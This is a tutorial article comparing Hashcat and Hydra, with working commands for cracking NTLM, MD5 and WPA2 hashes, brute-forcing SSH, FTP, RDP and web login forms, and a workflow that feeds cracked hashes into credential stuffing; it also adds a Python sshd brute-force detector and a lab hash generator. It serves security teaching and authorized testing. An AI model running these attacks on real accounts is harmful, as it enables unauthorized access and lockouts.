Last updated: March 2026
Hashcat vs Hydra: Which Password Tool Should You Use? (2026)
Hashcat and Hydra solve different problems: Hashcat cracks captured password hashes offline at GPU speeds (billions of attempts per second), while Hydra brute-forces live login services online (limited by network speed and rate limits). Use Hashcat when you have a hash dump; use Hydra when you have only a login form and no captured hash.
Legal disclaimer: Only use these tools on systems you own or have explicit written authorization to test. Unauthorized access is illegal under the CFAA and equivalent laws worldwide.
Quick Comparison Table
| Feature | Hashcat | Hydra |
|---|---|---|
| Attack type | Offline (hash cracking) | Online (live service) |
| Requires live target | No | Yes |
| Speed | Billions/sec (GPU) | Hundreds/sec (network-limited) |
| GPU acceleration | Yes (CUDA/OpenCL) | No |
| Target examples | Hash dumps, .cap files, SAM DB | SSH, FTP, HTTP forms, RDP, SMB |
| Risk of detection | None (no network traffic) | High (login attempts are logged) |
| Account lockout risk | None | Yes — can trigger lockouts |
| Typical use case | Post-exploitation hash cracking | Service enumeration, testing |
When to Use Hashcat
Choose Hashcat when you have a captured hash and need to recover the plaintext password without touching the target system again.
Common scenarios:
- You dumped /etc/shadow from a compromised Linux machine
- You extracted NTLM hashes from a Windows SAM database or Active Directory via secretsdump
- You captured a WPA2 four-way handshake with airodump-ng
- You found MD5/SHA hashes in a database dump from a SQL injection
- You extracted Kerberos TGS tickets during Kerberoasting (-m 13100)
Hashcat never generates network traffic to the target. It runs entirely on your local GPU, making it undetectable to the target system's IDS or SIEM.
Hashcat Basic Examples
```bash
# Crack MD5 hash from a database dump
hashcat -m 0 -a 0 5f4dcc3b5aa765d61d8327deb882cf99 /usr/share/wordlists/rockyou.txt
# Crack NTLM hashes (Windows Active Directory)
hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
# Crack WPA2 handshake
hashcat -m 22000 -a 0 capture.hc22000 /usr/share/wordlists/rockyou.txt
# Add rules for better coverage
hashcat -m 1000 -a 0 -r /usr/share/hashcat/rules/best64.rule ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
```
See the full Hashcat Wordlist Attack Tutorial for detailed usage.
When to Use Hydra
Choose Hydra when you have access to a live service with a login prompt but no captured hash to crack offline.
Common scenarios:
- Testing default credentials on network devices (routers, switches, cameras)
- Validating password strength on an SSH server you administer
- Testing a web application login form for weak passwords
- Brute-forcing FTP/SMTP credentials during a penetration test
- Testing RDP authentication on Windows servers
Important considerations with online attacks:
- Most services log failed login attempts
- Many services implement rate limiting or temporary lockouts
- Account lockout policies can lock out real users — confirm policy before testing
- Network speed caps maximum attempts per second, regardless of your hardware
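The first two points above are what a defender sees: a Hydra run against SSH leaves a burst of sshd "Failed password" lines from one source, often across several usernames when -L is used. As an added example (not part of the original article), this Python detector parses constructed sshd log lines and flags any source with a cluster of failures in a short window, reporting the distinct usernames tried and whether a login succeeded after the burst began; the threshold, window and sample lines are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd auth lines (not from a real host). Syslog timestamps
# omit the year, so parse_auth_log takes it as a parameter.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 web01 sshd[2201]: Failed password for admin from 192.168.1.100 port 50122 ssh2
Mar  3 10:15:01 web01 sshd[2202]: Failed password for admin from 192.168.1.100 port 50123 ssh2
Mar  3 10:15:02 web01 sshd[2203]: Failed password for invalid user jsmith from 192.168.1.100 port 50124 ssh2
Mar  3 10:15:02 web01 sshd[2204]: Failed password for root from 192.168.1.100 port 50125 ssh2
Mar  3 10:15:03 web01 sshd[2205]: Failed password for admin from 192.168.1.100 port 50126 ssh2
Mar  3 10:15:04 web01 sshd[2207]: Accepted password for admin from 192.168.1.100 port 50128 ssh2
Mar  3 10:20:00 web01 sshd[2300]: Failed password for alice from 10.0.0.7 port 41000 ssh2
Mar  3 10:20:30 web01 sshd[2301]: Accepted password for alice from 10.0.0.7 port 41001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_auth_log(text, year=2026):
    """Yield (timestamp, source_ip, user, result) for each sshd auth line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            stamp = " ".join(m["ts"].split())  # collapse "Mar  3" to "Mar 3"
            yield datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S"), m["ip"], m["user"], m["result"]

def detect_bruteforce(text, threshold=5, window_s=60):
    """Flag source IPs with >= threshold failures inside window_s seconds; report the
    distinct usernames tried and whether a login succeeded after the burst started."""
    events = defaultdict(list)
    for ts, ip, user, result in parse_auth_log(text):
        events[ip].append((ts, user, result))
    alerts = {}
    for ip, evs in events.items():
        fails = [(ts, u) for ts, u, r in evs if r == "Failed"]
        for i, (start, _) in enumerate(fails):
            burst = [u for ts, u in fails[i:] if (ts - start).total_seconds() <= window_s]
            if len(burst) >= threshold:
                success_after = any(r == "Accepted" and ts >= start for ts, _, r in evs)
                alerts[ip] = {"failures": len(burst), "users": sorted(set(burst)),
                              "success_after_burst": success_after}
                break
    return alerts
```

A burst followed by a successful login is the case to page on; a single failure before a success, as for alice here, is ordinary user behaviour and is not flagged.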
Hydra Supported Protocols
Hydra supports 50+ protocols. Common ones:
ssh, ftp, http-get, http-post-form, https-post-form,
rdp, smb, smtp, pop3, imap, mysql, mssql, postgresql,
telnet, vnc, ldap2, ldap3, snmp, teamspeak, cisco
Hydra Syntax and Examples
Basic Syntax
```text
hydra [options] <target> <protocol>
```
Key flags:
- `-l <user>` — Single username
- `-L <file>` — Username list file
- `-p <pass>` — Single password
- `-P <file>` — Password list file
- `-t <n>` — Parallel connections (default: 16)
- `-s <port>` — Custom port
- `-v` — Verbose output
- `-V` — Very verbose (show each attempt)
- `-f` — Stop after first successful crack
SSH Brute-Force
```bash
# Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# Username list + password list
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# Custom port, 4 threads
hydra -l root -P passwords.txt -t 4 -s 2222 ssh://192.168.1.100
```
Expected output when a password is found:
```text
Hydra v9.5 (c) 2023 by van Hauser/THC
[DATA] max 16 tasks per 1 server
[DATA] attacking ssh://192.168.1.100:22/
[22][ssh] host: 192.168.1.100 login: admin password: password123
1 of 1 target successfully completed, 1 valid password found
```
FTP Brute-Force
```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.100
# With verbose output to see attempts
hydra -l admin -P /usr/share/wordlists/rockyou.txt -v ftp://192.168.1.100
```
HTTP POST Form (Web Login)
This is Hydra's most flexible mode. You need to identify three things:
1. The login URL path
2. The POST parameters (username and password field names)
3. A string that appears on a failed login page

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 \
http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid credentials"
```

Format: `<path>:<post_params>:<failure_string>`
- `^USER^` — Hydra substitutes the username here
- `^PASS^` — Hydra substitutes the password here
- The final field is a string found ONLY on failed login pages
For HTTPS targets:
```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 \
https-post-form "/login:username=^USER^&password=^PASS^:Login failed"
```
HTTP Basic Authentication
```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://192.168.1.100/admin
```
RDP (Windows Remote Desktop)
```bash
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.100 -t 1
```
Use -t 1 for RDP — it only accepts one connection at a time and will reject parallel attempts.
Hybrid Attacks: Combining Both Tools
In real engagements, Hashcat and Hydra are often used together in a workflow:
Workflow 1: Credential Stuffing from a Hash Dump
```bash
# Step 1: Crack hashes with Hashcat. ntlm_hashes.txt must be in user:hash form;
# --username tells hashcat to keep the username with each hash. Without it,
# -o writes hash:plain lines that carry no username at all.
hashcat -m 1000 -a 0 --username ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
# Step 2: Extract username:password pairs (--show --username prints user:hash:plain)
hashcat -m 1000 --username --show ntlm_hashes.txt | awk -F: '{print $1":"$NF}' > cracked.txt
cat cracked.txt
# admin:Password1
# jsmith:Summer2024!
# Step 3: Test cracked credentials on other services with Hydra
hydra -C cracked.txt ssh://10.10.10.50
```
The -C flag takes a user:pass file directly.
Workflow 2: WPA2 Cracking + Network Access
```bash
# Step 1: Capture WPA2 handshake (airodump-ng)
# Step 2: Crack with Hashcat
hashcat -m 22000 -a 0 capture.hc22000 /usr/share/wordlists/rockyou.txt
# Step 3: Once on the network, use Hydra against discovered services
hydra -L users.txt -P passwords.txt ssh://192.168.0.10
```
Speed Comparison
| Tool | Protocol | Speed | Hardware |
|---|---|---|---|
| Hashcat | MD5 | 164 GH/s | RTX 4090 |
| Hashcat | NTLM | 288 GH/s | RTX 4090 |
| Hashcat | WPA2 | 2,600 kH/s | RTX 4090 |
| Hydra | SSH | ~10-50/sec | Any (network-limited) |
| Hydra | HTTP | ~100-500/sec | Any (network-limited) |
| Hydra | FTP | ~50-200/sec | Any (service-limited) |
The speed difference is enormous. Against a 14.3 million password wordlist, Hashcat (MD5) finishes in under 1 millisecond. Hydra against SSH at 50 attempts/sec would take 80+ hours to exhaust the same list.
FAQ
Q: Can I use Hydra on any website's login page?
A: Only on systems you own or have written authorization to test. Web applications commonly deploy CAPTCHA, rate limiting, and lockout policies that will block automated tools. Attempting unauthorized access is illegal.
Q: Is Hashcat faster than John the Ripper?
A: Yes, significantly. Hashcat leverages GPU compute (CUDA/OpenCL), while John the Ripper primarily uses CPU. On an RTX 4090, Hashcat achieves ~164 GH/s on MD5 vs John's ~10-20 GH/s on CPU. John's advantage is automatic hash format detection and ease of use.
Q: Does Hydra support two-factor authentication?
A: No. Hydra cannot handle 2FA challenges. If a service requires a TOTP or push notification, Hydra will fail at that step. This is why enabling 2FA on internet-facing services effectively neutralizes most online brute-force attacks.
Q: Which tool should a beginner start with?
A: Start with Hashcat using a CTF hash or a local hash you created yourself. The offline nature means no risk of impacting real systems. Use echo -n "password" | md5sum to create a test hash, then crack it with hashcat -m 0 -a 0.
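As an added example (not from the original article), this Python helper builds the kind of self-made lab hashes the answer recommends, for several raw hash types and in both input layouts hashcat accepts (bare hashes, and user:hash lines for `--username`). It also reproduces the classic mistake of using `echo` without `-n`, which hashes the trailing newline and yields a hash no wordlist will crack. The plaintexts and output file names are constructed.

```python
import hashlib

# Hashcat mode numbers for the raw (unsalted) hash types generated here; the
# plaintexts used below are constructed lab values, not real credentials.
MODES = {"md5": 0, "sha1": 100, "sha256": 1400}

def make_test_hash(plaintext, algo="md5", trailing_newline=False):
    """Return the hex digest hashcat expects for plaintext under algo.
    trailing_newline=True mimics `echo "password" | md5sum` (no -n): the
    newline becomes part of the hashed data, so the result does not match
    the hash of "password" that a wordlist attack would test."""
    data = plaintext.encode() + (b"\n" if trailing_newline else b"")
    return hashlib.new(algo, data).hexdigest()

def write_lab_files(creds, algo="md5"):
    """Build both hashcat input layouts from (user, plaintext) pairs.
    Returns (mode, bare_hashes_text, user_hash_text)."""
    bare = [make_test_hash(p, algo) for _, p in creds]
    user_hash = [f"{u}:{h}" for (u, _), h in zip(creds, bare)]
    return MODES[algo], "\n".join(bare) + "\n", "\n".join(user_hash) + "\n"

if __name__ == "__main__":
    lab = [("admin", "password"), ("jsmith", "Summer2024!")]
    mode, bare, user_hash = write_lab_files(lab)
    with open("lab_hashes.txt", "w") as f:
        f.write(bare)
    with open("lab_user_hashes.txt", "w") as f:
        f.write(user_hash)
    # Commands to crack the two files; the second keeps usernames in the output
    print(f"hashcat -m {mode} -a 0 lab_hashes.txt /usr/share/wordlists/rockyou.txt")
    print(f"hashcat -m {mode} -a 0 --username lab_user_hashes.txt /usr/share/wordlists/rockyou.txt")
```

Note that make_test_hash("password") returns the same MD5 value used in the Hashcat Basic Examples above, so that command is the first one to try against the generated file.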